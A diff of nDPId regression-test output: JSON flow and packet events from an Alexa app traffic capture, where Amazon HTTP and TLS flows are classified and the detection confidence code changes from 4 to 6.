00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxNJprFn0NKXyaAScSAI+QAAAgQFtAQCCAps+nOsAPZytgEDAwg="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1490976134200,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134200,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0vDFAAEAGNB6sECrYNFQ\/OMsVAFCK3c6HwtatV4AQAVc6+AAAAQEICgD2crts+npU"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134148,"flow_last_seen":1490976134200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71pwMKDRQIL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134148,"flow_last_seen":1490976134200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71pwMKDRQIL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2047,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1490976134201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134201,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0TQdAAEAGo0isECrYNFQ\/OMsUAFAHRT+xsJsTXoAQAVf3QwAAAQEICgD2crxs+nys"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2048,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02IxAAEAGF8OsECrYNFQ\/OMsRAFDDaqo\/vffTz4AQAVcBnwAAAQEICgD2crxs+n3S"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2049,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xZZAAEAGKrmsECrYNFQ\/OMsSAFCeYrck8hQixoAQAVeWrQAAAQEICgD2crxs+n3S"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2050,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA05X9AAEAGCtCsECrYNFQ\/OMsTAFDQ0pfJSaaxaIAQAVeniQAAAQEICgD2crxs+nOs"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2051,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134146,"flow_last_seen":1490976134203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61oBTb+jZvL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2052,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134140,"flow_last_seen":1490976134203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/51woiL9kgkL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2053,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134141,"flow_last_seen":1490976134203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81diFQyVjHL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2054,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134144,"flow_last_seen":1490976134204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134204,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71GcCNTb6kL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2051,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134146,"flow_last_seen":1490976134203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61oBTb+jZvL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2052,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134140,"flow_last_seen":1490976134203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/51woiL9kgkL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2053,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134141,"flow_last_seen":1490976134203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81diFQyVjHL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2054,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134144,"flow_last_seen":1490976134204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134204,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71GcCNTb6kL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1490976134237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134237,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxaJEqCkMupghaAScSCurAAAAgQFtAQCCAps+nR5APZytgEDAwg="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":3,"flow_last_seen":1490976134238,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134238,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0EjNAAEAG3hysECrYNFQ\/OMsWAFAy6mCFiRKgpYAQAVdNOgAAAQEICgD2cr9s+nR5"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134149,"flow_last_seen":1490976134239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/612xlaOI2NL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134149,"flow_last_seen":1490976134239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/612xlaOI2NL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976136930,"flow_last_seen":1490976136930,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976136930,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1490976136930,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976136930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bqFAAEAGoEasECrYNu8d\/Z+nAbuZbx1qAAAAAKAC\/\/9PLQAAAgQFtAQCCAoA9nPLAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2237,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1490976137042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976137042,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwrQVAAOcGuu027x39rBAq2AG7n6dEArKimW8da3ASH\/7pVAAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2238,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":3,"flow_last_seen":1490976137043,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976137043,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobqJAAEAGoFmsECrYNu8d\/Z+nAbuZbx1rRAKyo1AQAVczxgAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2239,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976136930,"flow_last_seen":1490976137044,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976137044,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2241,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976136930,"flow_last_seen":1490976137222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976137222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2239,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976136930,"flow_last_seen":1490976137044,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976137044,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2241,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976136930,"flow_last_seen":1490976137222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976137222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139642,"flow_last_seen":1490976139642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1490976139642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139642,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ooBAAEAGTcesECrYNFQ\/OMsYAFAytNZaAAAAAKAC\/\/+zQgAAAgQFtAQCCAoA9nTaAAAAAAEDAwg="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2275,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -706,7 +706,7 @@ 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8MrZAAEAGvZGsECrYNFQ\/OMsdAFCU10ZqAAAAAKAC\/\/\/hCAAAAgQFtAQCCAoA9nTcAAAAAAEDAwg="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":1490976139667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139667,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxh7572AMrTWW6AScSAgygAAAgQFtAQCCAps+nrkAPZ02gEDAwg="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":3,"flow_last_seen":1490976139669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139669,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ooFAAEAGTc6sECrYNFQ\/OMsYAFAytNZbe+e9gYAQAVe\/XAAAAQEICgD2dN5s+nrk"} 